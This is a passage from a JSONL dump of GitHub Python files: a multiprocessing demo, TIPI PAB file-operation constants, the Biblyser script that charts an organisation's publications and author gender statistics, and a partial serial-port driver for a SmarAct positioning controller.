time\nimport multiprocessing\n\ndef test1():\n while True:\n print(\"1----------------\")\n time.sleep(1)\n\ndef test2():\n while True:\n print(\"2----------------\")\n time.sleep(1)\n\ndef main():\n t1 = multiprocessing.Process(target=test1)\n t2 = multiprocessing.Process(target=test2)\n t1.start()\n t2.start()\n\nif __name__ == '__main__':\n main()","repo_name":"IronmanJay/Python_Project","sub_path":"Multitask/Pocess/UseProcess.py","file_name":"UseProcess.py","file_ext":"py","file_size_in_byte":384,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"78"} +{"seq_id":"73123814331","text":"import logging\n\nlogger = logging.getLogger(__name__)\n\n#\n# PAB routines...\n#\n\nOPEN = 0\nCLOSE = 1\nREAD = 2\nWRITE = 3\nRESTORE = 4\nLOAD = 5\nSAVE = 6\nDELETE = 7\nSCRATCH = 8\nSTATUS = 9\n\n#\n# Return the TI DSR Opcode\n\n\ndef opcode(pab):\n return int(pab[0])\n\n\n# Constants for fileType\nSEQUENTIAL = 0x00\nRELATIVE = 0x01\n\n\ndef fileType(pab):\n return pab[1] & 0x01\n\n\n# Constants for modes\nUPDATE = 0x00\nOUTPUT = 0x01\nINPUT = 0x02\nAPPEND = 0x03\n\n\ndef mode(pab):\n return (pab[1] & 0x06) >> 1\n\n\n# Data types\nDISPLAY = 0x00\nINTERNAL = 0x01\n\n\ndef dataType(pab):\n return (pab[1] & 0x08) >> 3\n\n\n# Record types\nFIXED = 0x00\nVARIABLE = 0x01\n\n\ndef recordType(pab):\n return (pab[1] & 0x10) >> 4\n\n\n# Length of file records\n\n\ndef recordLength(pab):\n return pab[4]\n\n\n#\n# Return byte count from PAB / or byte count in LOAD/SAVE operations\n\n\ndef recordNumber(pab):\n return (pab[6] << 8) + pab[7]\n\n\n#\n# pretty pab string\n\n\ndef logPab(pab):\n opcodes = {\n 0: \"Open\",\n 1: \"Close\",\n 2: \"Read\",\n 3: \"Write\",\n 4: \"Restore\",\n 5: \"Load\",\n 6: \"Save\",\n 7: \"Delete\",\n 8: \"Scratch\",\n 9: \"Status\",\n }\n fileTypes = {SEQUENTIAL: \"Sequential\", RELATIVE: \"Relative\"}\n modes = {UPDATE: \"Update\", OUTPUT: \"Output\", INPUT: \"Input\", APPEND: \"Append\"}\n dataTypes = {DISPLAY: \"Display\", INTERNAL: \"Internal\"}\n recordTypes = {FIXED: \"Fixed\", VARIABLE: \"Variable\"}\n logger.info(\n \"opcode: %s, fileType: %s, mode: %s, dataType: %s, recordType: %s, recordLength: %d, recordNumber: %d\",\n opcodes[opcode(pab)],\n fileTypes[fileType(pab)],\n modes[mode(pab)],\n dataTypes[dataType(pab)],\n recordTypes[recordType(pab)],\n recordLength(pab),\n recordNumber(pab),\n )\n\n\n#\n# Error Codes\nEDVNAME = 0x00\nEWPROT = 0x01\nEOPATTR = 0x02\nEILLOP = 0x03\nENOSPAC = 0x04\nEEOF = 0x05\nEDEVERR = 0x06\nEFILERR = 0x07\n# TIPI Success\nSUCCESS = 0xFF\n\n#\n# Status constants to be OR'ed together\nSTNOFILE = 0x80\nSTPROTECTED = 0x40\nSTRES1 = 0x20\nSTINTERNAL = 0x10\nSTPROGRAM = 0x08\nSTVARIABLE = 0x04\nSTPEOF = 0x02\nSTLEOF = 0x01\n","repo_name":"jedimatt42/tipi","sub_path":"services/Pab.py","file_name":"Pab.py","file_ext":"py","file_size_in_byte":2106,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"78"} +{"seq_id":"18140218727","text":"\"\"\"\nBiblyser (c) is a bibliometric workflow for evaluating the bib metrics of an \nindividual or a group of people (an organisation).\n\nBiblyser is licensed under a MIT License.\n\nYou should have received a copy of the license along with this work. If not, \nsee .\n\"\"\"\n\nimport sys\nimport numpy as np\nimport pandas as pd\nfrom collections import Counter\nfrom textwrap import wrap\nimport matplotlib.gridspec as gridspec\nimport matplotlib.pyplot as plt\nfrom matplotlib.ticker import StrMethodFormatter\n\n#sys.path.append('../')\nfrom biblyser.bibcollection import getGenderDistrib, countByYear\n\n \n#Import organisation from csv\norg_df = pd.read_csv('output/out_organisation.csv')\n\n#Import bibcollection from csv \ndf = pd.read_csv('output/out_bibs.csv')\n\n#Convert column items to appropriate objects\ndf['org_led'] = df['org_led'].astype('bool')\ndf['date'] = pd.to_datetime(df['date'], format='%Y-%m-%d %H:%M:%S')\ndf['year'] = df['date'].dt.year\n\n#Define bins\nbin10=[0, 1, 10, 20, 30, 40, 50, 60, 70, 80, 90, 99, 100]\nbin25=[0, 1, 25, 50, 75, 99, 100]\n\n#Define bin labels\nl10 = ['0', '1-10', '11-20', '21-30', '31-40', '41-50', '51-60', '61-70', \n '71-80', '81-90', '91-99', '100']\nl25 = ['0%', '1-25%', '26-50%', '51-75%', '76-99%', '100%']\n\n#Set color palettes\ncold = ['#337BA7','#08589e','#2b8cbe','#4eb3d3','#7bccc4','#a8ddb5', '#ccebc5']\nwarm = ['#C85353','#fed976','#feb24c','#fd8d3c','#fc4e2a','#e31a1c','#bd0026']\n\n\n#------------------ Fetch and plot general publication stats ----------------\n\n\n#Get count from first author publications\nfirst = df.loc[df['org_led']==True] \nfirst_yr = countByYear(first)\n\n#Get count from co-author publications\ncoauthor = df.loc[df['org_led']==False] \nco_yr = countByYear(coauthor)\n\n#Merge and rename columns\nco_yr['First author'] = first_yr['count']\nall_yr = co_yr.rename(columns={'count' : 'Co-author'})\n\n#Group journals\njournals = df['journal'].groupby(df['journal']).agg({'count'}).sort_values(by=['count'], \n ascending=True)\nj10 = journals.tail(10)\nothers = len(list(journals['count'][:-10]))\n\n#Affiliations of authorship\naffiliations = list(df['affiliations'])\nout1=[]\nfor a in affiliations:\n allc = a.split(', ')\n [out1.append(a) for a in allc]\nout1 = Counter(out1).most_common()\naff_keys10 = [o[0] for o in out1[1:11]]\naff_vals10 = [o[1] for o in out1[1:11]]\naff_keys10.append('Others')\naff_vals10.append(sum(sorted(list(Counter(out1).values()))[11:]))\n \n#Countries of authorship\ncountries = list(df['countries'])\nout=[]\nfor c in countries:\n allc = c.split(', ')\n [out.append(a) for a in allc]\nout = Counter(out).most_common()\nco_keys10 = [o[0] for o in out[0:10]]\nco_vals10 = [o[1] for o in out[0:10]]\nco_keys10.append('Others')\nco_vals10.append(sum(sorted(list(Counter(out).values()))[10:]))\n\n#Prime subplots\nfig1, ax1 = plt.subplots(1, 1, figsize=(10,10))\nfig1.tight_layout(pad=4, h_pad=8, w_pad=0)\nax2 = ax1.inset_axes([0.2,0.47,0.3,0.2]) #Journals bar plt\nax3 = ax1.inset_axes([0.21,0.75,0.2,0.2]) #Pie #1\nax4 = ax1.inset_axes([0.54,0.75,0.2,0.2]) #Pie #2\n\n#Set font styles and colour palettes\nfontname='Arial'\ntitle = 18\nlfont1 = 14\nlfont2 = 10\nlfont3 = 7 \ntfont = {'fontsize':10, 'color':'#5D5D5D'}\nbar_col = ['#0C7BDC','#FFC20A', '#CA4646']\npie_col = ['#332288','#88CCEE','#44AA99','#117733','#999933','#DDCC77',\n '#CC6677','#882255','#AA4499','#6F3866','#DDDDDD']\n\n#Plot year vs. authorships\nall_yr.plot(kind='bar', stacked=False, color=[bar_col[0],bar_col[1]], ax=ax1)\nax1.set(ylim=(0,40), yticks=[0,10,20,30,40], xlabel='Date', \n ylabel='Number of publications')\n\n#Alter plot aesthetics\nax1.tick_params(axis='both', labelsize=tfont['fontsize'], labelcolor=tfont['color'])\nax1.spines['right'].set_visible(False)\nax1.spines['top'].set_visible(False)\nax1.yaxis.set_major_formatter(StrMethodFormatter('{x:,.0f}')) \n \n#Set annotations\nax1.set_ylabel('Number of publications', labelpad=10, fontsize=lfont1)\nax1.set_xlabel('Date', labelpad=10, fontsize=lfont1)\nax1.legend(loc=4, fontsize=lfont2, framealpha=1,\n title='Publications by year')\n\n#Plot popular journals \nax2.barh([l*2 for l in np.arange(10)], list(j10['count']), color=bar_col[2])\nax2.set_yticks([l*2 for l in np.arange(10)])\nlabels = [ '\\n'.join(wrap(l, 30)) for l in list(j10.index)]\nax2.set_yticklabels(labels, fontsize=lfont3)\nax2.tick_params(axis='x', labelsize=8, labelcolor=tfont['color'])\nax2.spines['right'].set_visible(False)\nax2.spines['top'].set_visible(False)\nax2.text(20, 0.5, f'Number of other journals: {others}', fontsize=lfont3)\n\n#Plot top collaborator affiliations\np3,t3 = ax3.pie(aff_vals10, startangle=90, colors=pie_col, \n wedgeprops={\"edgecolor\":\"w\",'linewidth':1})\nlegend_labels = [ '\\n'.join(wrap(l, 30)) for l in aff_keys10]\nax3.legend(legend_labels, loc='center left', bbox_to_anchor=(-1.0, 0.5), \n fontsize=lfont3)\n\n#Plot top collaborator countries\np4,t4 = ax4.pie(co_vals10, startangle=90, colors=pie_col, \n wedgeprops={\"edgecolor\":\"w\",'linewidth':1})\nlegend_labels = [ '\\n'.join(wrap(l, 15)) for l in co_keys10]\nax4.legend(legend_labels, loc='center left', bbox_to_anchor=(-0.6, 0.5), \n fontsize=lfont3)\n\n#Plot summary table\nax4 = ax1.inset_axes([-0.02,0.38,0.4,0.1])\ncells = [['Total publications', str(len(df.index))], \n ['Organisation-led publications', str(len(first.index))], \n ['Co-authored publications', str(len(coauthor.index))],\n ['Average citation count', str(int(np.nanmean(list(df['citations']))))],\n ['Average altmetrics', str(int(np.nanmean(list(df['altmetric']))))]]\ntable = ax4.table(cellText=cells, colWidths=[0.6,0.2], edges='horizontal',\n cellLoc='left')\nax4.axis(\"off\")\ntable.scale(1, 1.25)\ntable.auto_set_font_size(False)\ntable.set_fontsize(lfont3)\n\n#Set annotations\nplt.title('GEUS publications', fontsize=title)\nax1.text(1, 39.7, 'Top collaborators', fontsize=lfont1)\nax1.text(1, 27.2, 'Top journals', fontsize=lfont1)\nax1.text(1, 15.8, 'Summary statistics', fontsize=lfont1)\n\n#Plot and save\nplt.rcParams[\"font.family\"] = fontname\nplt.savefig('output/publication_stats.jpg', dpi=300)\nplt.show()\n# plt.close()\n\n#------------ Publication lead and co-authorship by gender ----------------\n\n\n#Set font styles \nhfont = {'fontname':'Arial', 'fontsize':16}#, 'fontweight': 'bold'}\nlfont1 = {'fontname':'Arial', 'fontsize':12, 'color':'#5D5D5D'} \ntfont = {'fontname':'Arial', 'fontsize':8, 'color':'#5D5D5D'}\n\n#Get org gender from org papers\ndf1=pd.DataFrame()\nfor index, row in df.iterrows():\n f_led=0\n f_co=0\n m_led=0\n m_co=0\n genders = str(row['org_genders']).split(', ')\n if row['org_led']==True: \n if genders[0]=='female':\n f_led=f_led+1\n else:\n m_led=m_led+1\n genders = genders[1:]\n \n for g in genders:\n if g=='female':\n f_co=f_co+1\n else:\n m_co=m_co+1 \n #Construct pandas series and append to dataframe\n series = pd.Series({'year': row['date'].year, \n 'female_lead': f_led,\n 'male_lead': m_led, \n 'female_co': f_co,\n 'male_co': m_co})\n df1 = df1.append(series, ignore_index=True)\n\n#Group and sum by year\ndf2 = df1.groupby(['year']).agg({'female_lead':'sum','male_lead':'sum',\n 'female_co':'sum','male_co':'sum'}) \nyears = [int(y) for y in list(df2.index)]\nx = list(range(len(years)))\nx = [float(x1)*2 for x1 in x]\nx = np.array(x)\n\n#Prime plotting area\nfig1 = plt.figure(figsize=(10,10))\ngs = gridspec.GridSpec(2, 3, figure=fig1)\nax1 = plt.subplot(gs[:, 0])\ngs.update(hspace=0)\nax2 = plt.subplot(gs[0, 1:])\nax3 = plt.subplot(gs[1, 1:], sharex=ax2)\n\n#Plot as bars \nax1.bar([0,1,3,4], [sum(list(df2['female_lead'])),\n sum(list(df2['male_lead'])),sum(list(df2['female_co'])),\n sum(list(df2['male_co']))], width=1, edgecolor='w', \n color=[cold[2], warm[5], cold[4], warm[3]], align='center') \nax2.bar(x-0.3, list(df2['female_lead']), width=0.6, color=cold[2], \n align='center', label='Female lead author')\nax2.bar(x+0.3, list(df2['male_lead']), width=0.6, color=warm[5], \n align='center', label='Male lead author')\nax3.bar(x-0.3, list(df2['female_co']), width=0.6, color=cold[4], \n align='center', label='Female co-author')\nax3.bar(x+0.3, list(df2['male_co']), width=0.6, color=warm[3], \n align='center', label='Male co-author')\n\n#Set legends\n[ax.legend(loc=2, fontsize=lfont1['fontsize']) for ax in [ax2, ax3]]\n\n#Set x axes\nax1.set_xticks([0,1,3,4])\nax1.set_xticklabels(['Female\\nlead', 'Male\\nlead', 'Female\\nco', \n 'Male\\nco'], **tfont)\nax2ytwin = ax2.twiny()\nfor ax in [ax2ytwin, ax3]:\n ax.set_xlim(0.6,x[-1]+1)\n ax.set_xticks(x[1:])\n ax.set_xticklabels(years[1:], rotation=45, **tfont)\n\n#Set y axes\nax1.set_ylim(0,450)\nax1.set_yticks([0,100,200,300,400])\nax1.set_yticklabels(['0','100','200','300','400'], **tfont)\nax2xtwin = ax2.twinx()\nfor ax in [ax2, ax2xtwin]:\n ax.set_ylim(0,15)\n ax.set_yticks([0,3,6,9,12,15])\n ax.set_yticklabels(['0','3','6','9','12',''], **tfont)\nax3xtwin = ax3.twinx()\nfor ax in [ax3, ax3xtwin]:\n ax.set_ylim(0,50)\n ax.set_yticks([0,10,20,30,40,50])\n ax.set_yticklabels(['0','10','20','30','40',''], **tfont)\n\n#Set plot grids \n[ax.set_axisbelow(True) for ax in [ax1,ax2,ax3]]\n[ax.grid(color='gray', linestyle='dashed', axis='y') for ax in [ax1,ax2,ax3]] \n\n#Plot summary table of organisation\nax4 = ax1.inset_axes([0.15,0.943,0.4,0.1])\ncells = [['Total female colleagues', str(list(org_df['guessed_gender']).count('female'))], \n ['Total male collegues', str(list(org_df['guessed_gender']).count('male'))], \n ['Professors', str(list(org_df['title']).count('Forskningsprofessor'))],\n ['Seniorforsker', str(list(org_df['title']).count('Seniorforsker'))],\n ['Forsker', str(list(org_df['title']).count('Forsker'))],\n ['Post-doctoral researchers', str(list(org_df['title']).count('Postdoc'))], \n ['PhD students', str(list(org_df['title']).count('Ph.d.-studerende'))],\n ['Other staff', str(list(org_df['title']).count('Chefkonsulent') +\n list(org_df['title']).count('Statsgeolog') + \n list(org_df['title']).count('AC-medarbejder') + \n list(org_df['title']).count('Seniorrådgiver'))]] \ntable = ax4.table(cellText=cells, colWidths=[1.3,0.2], edges='horizontal',\n cellLoc='left', alpha=1, zorder=1)\nax4.axis(\"off\")\ntable.scale(1, 1.25)\ntable.auto_set_font_size(False)\ntable.set_fontsize(tfont['fontsize'])\n\n#Set labels and annotations\nax1.text(-0.4, 432, 'Organisation summary', fontsize=lfont1['fontsize'])\nax1.set_ylabel('Total publications', **lfont1)\nax2xtwin.set_ylabel('Number of publications (per year)', **lfont1, rotation=270)\nax2xtwin.yaxis.set_label_coords(1.08, 0)\n\n#Plot and save\nplt.rcParams[\"font.family\"] = fontname\nplt.tight_layout()\nplt.savefig('output/publication_genders.jpg', dpi=300) \nplt.show() \n# plt.close() \n\n\n#---------- % female/male authorship in organisation-led papers ------------\n\n\n#Get only organisation-led papers\norg_led = df.loc[df['org_led']==True] \n\n#Compute gender percentages in authorships\nfauthors, mauthors, nbauthors = getGenderDistrib(org_led)\n\n#Calculate bins for pie charts\nfauthors_bin, b1 = np.histogram(fauthors, bin25, range=(bin25[0],bin25[-1])) \nmauthors_bin, b2 = np.histogram(mauthors, bin25, range=(bin25[0],bin25[-1])) \n\n#Prime subplots\nfig1, (ax1, ax3) = plt.subplots(2, 1, figsize=(10,10))\nfig1.tight_layout(pad=4, h_pad=8, w_pad=0)\n\n#Set font styles and colour palettes\nhfont = {'fontname':'Arial', 'fontsize':16}#, 'fontweight': 'bold'}\nlfont1 = {'fontname':'Arial', 'fontsize':14} \nlfont2 = {'fontname':'Arial', 'fontsize':10} \ntfont = {'fontname':'Arial', 'fontsize':12, 'color':'#5D5D5D'}\nafont = {'fontname':'Arial', 'fontsize':8} \n\n\n#Plot histograms\nh1,e1 = np.histogram(fauthors, bins=bin10)\nh2,e2 = np.histogram(mauthors, bins=bin10)\n\nax1.bar(list(range(0, (len(bin10)-1)*10, 10)), h1, width=10, \n color=cold[0], edgecolor='white')\nax3.bar(list(range(0, (len(bin10)-1)*10, 10)), h2, width=10, \n color=warm[0], edgecolor='white')\n\nax1.axvline(sum(fauthors)/len(fauthors), linewidth=2, color=cold[1])\nax3.axvline(sum(mauthors)/len(mauthors), linewidth=2, color=warm[-1])\n\n#Plot pie charts\nax2 = ax1.inset_axes([0.45,0.3,0.65,0.65])\nax4 = ax3.inset_axes([-0.08,0.3,0.65,0.65])\np2,t2,a2 = ax2.pie(fauthors_bin, explode=(0.1, 0, 0, 0, 0, 0), labels=l25, \n colors=cold[1:],textprops=lfont2, autopct='%1.0f%%', \n startangle=90, wedgeprops={\"edgecolor\":\"w\",'linewidth':1},\n pctdistance=0.5, labeldistance=1.05)\np4,t4,a4 = ax4.pie(mauthors_bin, explode=(0, 0, 0, 0, 0.1, 0), labels=l25, \n colors=warm[1:], textprops=lfont2, autopct='%1.0f%%', \n startangle=90, wedgeprops={\"edgecolor\":\"w\",'linewidth':1},\n pctdistance=0.5, labeldistance=1.05)\n\n#Set histogram plot parameters\nfor ax in [ax1,ax3]:\n ax.set_xlim(-5, (len(bin10)-1)*10)\n ax.set_ylim(0,60)\n ax.set_xticks([0,10,20,30,40,50,60,70,80,90,100,110])\n ax.set_xticklabels(l10, tfont)\n ax.set_yticklabels(ax.get_yticks(), tfont)\n ax.yaxis.set_major_formatter(StrMethodFormatter('{x:,.0f}')) \n ax.set_ylabel('Number of publications', **lfont1)\n ax.spines['right'].set_visible(False)\n ax.spines['top'].set_visible(False)\nax1.set_xlabel('% female authorship', **lfont1)\nax3.set_xlabel('% male authorship', **lfont1)\n\n#Set pie plot parameters\nfor ax in [ax2,ax4]:\n ax.axis('equal')\nfor a in [a2,a4]:\n [text.set_color('#5D5D5D') for text in a]\n [text.set_fontsize(10) for text in a]\nfor at in [a2[0],a2[1],a2[2],a4[-1],a4[-2],a4[-3]]:\n at.set_color('white')\n\n#Adjust pie chart label position\nx,y = t4[0].get_position()\nt4[0].set_position((x+0.1, y+0.05))\nx,y = t4[1].get_position()\nt4[1].set_position((x, y+0.1))\nx,y = t2[5].get_position()\nt2[5].set_position((x-0.1, y+0.1))\nfor p in [[p2,a2],[p4,a4]]:\n for patch, txt in zip(p[0], p[1]):\n ang = (patch.theta2 + patch.theta1) / 2.\n x = patch.r * 0.7 * np.cos(ang * np.pi / 180)\n y = patch.r * 0.7 * np.sin(ang * np.pi / 180)\n if (patch.theta2 - patch.theta1) < 5.:\n txt.set_position((x, y))\n \n#Set plot annotations\nax1.text(sum(fauthors)/len(fauthors)-1.5, 38, 'Average female authorship', \n rotation=90, color=cold[1], **afont)\nax3.text(sum(mauthors)/len(mauthors)-1.5, 39.5, 'Average male authorship', \n rotation=90, color=warm[-1], **afont)\n \n#Set figure titles\nfig1.text(0.5,0.970,'% female authorship in organisation-led papers', \n horizontalalignment='center', verticalalignment='top', **hfont)\nfig1.text(0.5,0.470,'% male authorship in organisation-led papers', \n horizontalalignment='center', verticalalignment='top', **hfont)\n\n#Configure plot boxes\nrect1 = plt.Rectangle((0.02, 0.02), 0.95, 0.97, fill=False, color='#767676', \n lw=1, zorder=1000, transform=fig1.transFigure, \n figure=fig1)\nfig1.patches.extend([rect1])\n\n#Plot and save\nplt.savefig('output/authorship_genders.jpg', dpi=300)\nplt.show()\n# plt.close()\n\n\n#------------ Gender % when 1st/last author is male or female -------------\n\n\n#Set font styles and colour palettes\nhfont = {'fontname':'Arial', 'fontsize':16}#, 'fontweight': 'bold'}\nlfont1 = {'fontname':'Arial', 'fontsize':13} \nlfont2 = {'fontname':'Arial', 'fontsize':13, 'color':'#5D5D5D'} \ntfont = {'fontname':'Arial', 'fontsize':12, 'color':'#5D5D5D'}\n\n#Prime plots\nfig1, ((ax1, ax2), (ax3, ax4), (ax5, ax6), (ax7, ax8)) = plt.subplots(4, 2, \n figsize=(10,10),\n gridspec_kw={'wspace':0, \n 'hspace':0},\n sharex=True,\n sharey=True)\n\n#Iterate through plots\nfor i,ax,t,c1,c2 in zip([['first_gender','female'], ['first_gender','male'],\n ['last_gender','female'], ['last_gender','male']],\n [[ax1,ax2],[ax3,ax4],[ax5,ax6],[ax7,ax8]], \n ['Female lead author', 'Male lead author', \n 'Female last author', 'Male last author'],\n cold[1:6], reversed(warm[1:6])):\n \n #Compute gender percentages from female/male-led authorships\n gens = df.loc[df[i[0]]==i[1]] \n \n #Get gender distribution bins\n fauthors, mauthors, nbauthors = getGenderDistrib(gens, first=False)\n h1,e1 = np.histogram(fauthors, bins=bin10)\n h2,e2 = np.histogram(mauthors, bins=bin10)\n \n #Plot as bar histograms\n ax[0].bar(list(range(0, (len(bin10)-1)*10, 10)), h1, width=10, color=c1, \n edgecolor='white')\n ax[1].bar(list(range(0, (len(bin10)-1)*10, 10)), h2, width=10, color=c2, \n edgecolor='white')\n \n #Twin y axes\n twinax = ax[1].twinx()\n twinax.set_ylim(0,180)\n twinax.set_yticks([0,30,60,90,120,150,180])\n twinax.set_yticklabels(['0', '', '60','', '120', '', ''], tfont) \n \n#Set ticks and grids for all plots\nfor ax in [ax1,ax2,ax3,ax4,ax5,ax6,ax7,ax8]: \n ax.set_axisbelow(True)\n ax.grid(color='gray', linestyle='dashed', axis='y') \n ax.set_xlim(-5, ((len(bin10)-1)*10)-5)\n ax.set_xticks([0,10,20,30,40,50,60,70,80,90,100,110])\n ax.set_xticklabels(l10, tfont, rotation=45)\n ax.set_ylim(0,180)\n ax.set_yticks([0,30,60,90,120,150,180])\n ax.set_yticklabels(['0', '', '60','', '120', '', ''], tfont) \n\n#Set labels\nax7.set_ylabel('Number of publications', **lfont2)\ntwinax.set_ylabel('Number of publications', **lfont2, rotation=270)\nax7.yaxis.set_label_coords(-0.1, 2)\ntwinax.yaxis.set_label_coords(1.15, 2)\nax7.set_xlabel('% female co-authorship', labelpad=10, **lfont1)\nax8.set_xlabel('% male co-authorship', labelpad=10, **lfont1)\n\n#Set plot titles\nposx=0.51\nposy=0.84\nfor txt in ['Female lead author', 'Male lead author', \n 'Female last author', 'Male last author']:\n fig1.text(posx, posy, txt, ha='center', \n bbox=dict(lw=1, ec='k', facecolor='w', boxstyle='round', \n alpha=1), transform=fig1.transFigure, **lfont1)\n posy=posy-0.193\nfig1.text(0.51, 0.96, \n 'Co-authorship gender composition based on first and last author gender', \n ha='center', **hfont)\n\n#Set twin x axes\nfor ax in [ax1,ax2]:\n twinax = ax.twiny()\n twinax.set_xlim(-5, ((len(bin10)-1)*10)-5)\n twinax.set_xticks([0,10,20,30,40,50,60,70,80,90,100,110])\n twinax.set_xticklabels(l10, tfont, rotation=45)\n\n#Plot and save\nplt.rcParams[\"font.family\"] = fontname\nplt.savefig('output/authorship_lead_last.jpg', dpi=300)\nplt.show()\n# plt.close()\n \n\n#------------------------------------------------------------------------------\n\nprint('Finished')\n","repo_name":"GEUS-Glaciology-and-Climate/Biblyser","sub_path":"biblyser/examples/getStats.py","file_name":"getStats.py","file_ext":"py","file_size_in_byte":19205,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"4317449423","text":"import serial\nimport json\nimport time\nimport logging\n\n\nclass SmarActController:\n def __init__(self, com_port) -> None:\n self.com = com_port\n self.ser = None\n self.num_of_channel = 0\n self.max_acceleration = 10E6\n self.max_speed = 100E6\n self.freq_min = 50\n self.freq_max = 18500\n self.status = {}\n logging.debug(\"Loading error codes json\")\n with open('error_code.json') as file:\n self.error_codes = json.load(file)\n logging.debug(\"Error codes json loaded\")\n logging.debug(\"Loading status json\")\n with open('status.json') as file:\n self.status = json.load(file)\n logging.debug(\"Status json loaded\")\n pass\n \n def connect(self):\n try:\n logging.info(\"Connecting to {} serial port\".format(self.com))\n self.ser = serial.Serial(self.com, 9600, timeout=1)\n logging.info(\"Connected to {}\".format(self.com))\n self.num_of_channel = self.get_number_of_channels()\n logging.info(\"Detected {} channels\".format(self.num_of_channel))\n except Exception as e:\n print(\"Unable to connect\")\n logging.critical(\"Unable to connect: \" + str(e))\n raise Exception(\"Unable to connect: \" + str(e))\n return self.connected()\n\n def connected(self):\n return self.ser.is_open\n \n def disconnect(self):\n if self.connected():\n self.ser.close()\n logging.info(\"Disconnected to {}\".format(self.com))\n \n def send(self,command):\n if self.connected():\n self.ser.write(bytes(\":{}\\n\".format(command), 'utf-8'))\n message = self.ser.readline()\n if message.startswith(b':') and message.endswith(b'\\n'):\n message = message.removeprefix(b':')\n message = message.removesuffix(b'\\n')\n message_string = message.decode()\n error = self.error_check(message_string)\n if error[0] > 0:\n print(error[1])\n print(error[2])\n return message_string\n else:\n return None\n \n def status_polling(self, channel:int, target_state, timeout = 60, verbose:bool = True):\n status = self.get_status(channel)\n previous_state = status\n if verbose:\n print(self.status[status])\n logging.info(\"Channel {} status: {}\". format(channel, self.status[status]))\n timeout_elapsed = False\n start_time = time.time()\n while (status != str(target_state) and not timeout_elapsed):\n status = self.get_status(channel)\n if status != previous_state:\n if verbose:\n print(self.status[status])\n logging.info(\"Channel {} status: {}\". format(channel, self.status[status]))\n previous_state = status\n if (time.time()-start_time) > timeout:\n logging.info(\"Channel {} polling timeout elapsed ({}s)\". format(channel, timeout))\n timeout_elapsed = True\n time.sleep(0.1)\n \n def homing(self, channel:int, relative_position, timeout, verbose:bool = True):\n positions = []\n time_elapsed = []\n target_state = 0\n self.move_position_relative(0, relative_position, 10)\n status = self.get_status(channel)\n previous_state = status\n if verbose:\n print(self.status[status])\n logging.info(\"Channel {} status: {}\". format(channel, self.status[status]))\n timeout_elapsed = False\n start_time = time.time()\n while (status != str(target_state) and not timeout_elapsed):\n status = self.get_status(channel)\n positions.append(self.get_position(0, True))\n time_elapsed.append(time.time())\n if status != previous_state:\n if verbose:\n print(self.status[status])\n logging.info(\"Channel {} status: {}\". format(channel, self.status[status]))\n previous_state = status\n if (time.time()-start_time) > timeout:\n logging.info(\"Channel {} polling timeout elapsed ({}s)\". format(channel, timeout))\n timeout_elapsed = True\n time.sleep(0.1)\n return time_elapsed, positions\n\n \n def get_system_id(self):\n raw = self.send(\"GSI\")\n logging.info(\"Get System ID: {}\". format(raw))\n return raw\n \n def get_number_of_channels(self):\n raw = self.send(\"GNC\")\n raw = raw.removeprefix('N')\n logging.info(\"Get number of channel: {}\". format(raw))\n return int(raw)\n \n def error_check(self, raw:str):\n if raw.startswith('E-1'):\n error_code = raw.removeprefix('E-1,')\n if error_code in self.error_codes.keys():\n return [int(error_code), self.error_codes[error_code][\"description\"], self.error_codes[error_code][\"long_description\"]]\n else:\n return [int(error_code), \"Error not found\",\"Error not found\"]\n else:\n return [0, self.error_codes[\"0\"][\"description\"],self.error_codes[\"0\"][\"long_description\"]]\n \n def command_status(self, raw):\n error = self.error_check(raw)\n if error[0] == 0:\n print(\"Command OK\")\n logging.info(\"Command OK\")\n else:\n print(\"Error code: {}\\n {}\".format(error[0], error[1]))\n logging.info(\"Error code: {}\\n {}\".format(error[0], error[1]))\n logging.debug(error[2])\n \n def write_channel(self, channel:int, command):\n if channel >= 0 and channel < self.num_of_channel:\n raw = self.send(\"{}{}\".format(command,channel))\n return raw\n else:\n return None\n \n def write_channel_argument(self, channel:int, command, arguments):\n if channel >= 0 and channel < self.num_of_channel:\n raw = self.send(\"{}{},{}\".format(command, channel, arguments))\n return raw\n else:\n return None\n \n def get_closed_loop_acceleration(self, channel:int):\n raw = self.write_channel(channel, 'GCLA')\n if raw is not None:\n raw = raw.removeprefix(\"CLA{},\".format(channel))\n logging.info(\"Get close loop acceleration ch{}: {} nm/s^2\".format(channel, raw))\n return int(raw)\n \n def get_closed_loop_speed(self, channel:int):\n raw = self.write_channel(channel, 'GCLS')\n if raw is not None:\n raw = raw.removeprefix(\"CLS{},\".format(channel))\n logging.info(\"Get close loop speed ch{}: {} nm/s\".format(channel, raw))\n return int(raw)\n \n def get_scale(self, channel:int):\n raw = self.write_channel(channel, 'GSC')\n if raw is not None:\n raw = raw.removeprefix(\"SC{},\".format(channel))\n part = raw.partition(',')\n return [int(part[0]), int(part[2])]\n \n def get_safe_direction(self, channel:int):\n raw = self.write_channel(channel, 'GSD')\n if raw is not None:\n raw = raw.removeprefix(\"SD{},\".format(channel))\n logging.info(\"Get safe direction ch{}: {}\".format(channel, raw))\n return int(raw)\n \n def get_sensor_type(self, channel:int):\n raw = self.write_channel(channel, 'GST')\n if raw is not None:\n raw = raw.removeprefix(\"ST{},\".format(channel))\n logging.info(\"Get sensor type ch{}: {}\".format(channel, raw))\n return int(raw)\n \n def set_closed_loop_acceleration(self, channel:int, acceleration:int):\n if acceleration >= 0 and acceleration < self.max_acceleration:\n raw = self.write_channel_argument(channel, 'SCLA', str(int(acceleration)))\n logging.info(\"Set close loop acceleration ch{}: {} nm/s\".format(channel, acceleration))\n self.command_status(raw)\n\n def set_closed_loop_max_frequency(self, channel:int, frequency:int):\n if frequency >= self.freq_min and frequency <= self.freq_max:\n raw = self.write_channel_argument(channel, 'SCLF', str(int(frequency)))\n logging.info(\"Set close loop frequency ch{}: {} Hz\".format(channel, frequency))\n self.command_status(raw)\n\n def set_closed_loop_move_speed(self, channel:int, speed:int):\n if speed >= 0 and speed <= self.max_speed:\n raw = self.write_channel_argument(channel, 'SCLS', str(int(speed)))\n logging.info(\"Set close loop speed ch{}: {} nm/s\".format(channel, speed))\n self.command_status(raw)\n\n def set_safe_direction(self, channel:int, direction:int):\n if direction == 0 or direction == 1:\n raw = self.write_channel_argument(channel, 'SSD', str(int(direction)))\n logging.info(\"Set safe direction ch{}: {} \".format(channel, direction))\n self.command_status(raw)\n\n def set_sensor_type(self, channel:int, sensor_type:int):\n if sensor_type >= 0 and sensor_type <= 56:\n raw = 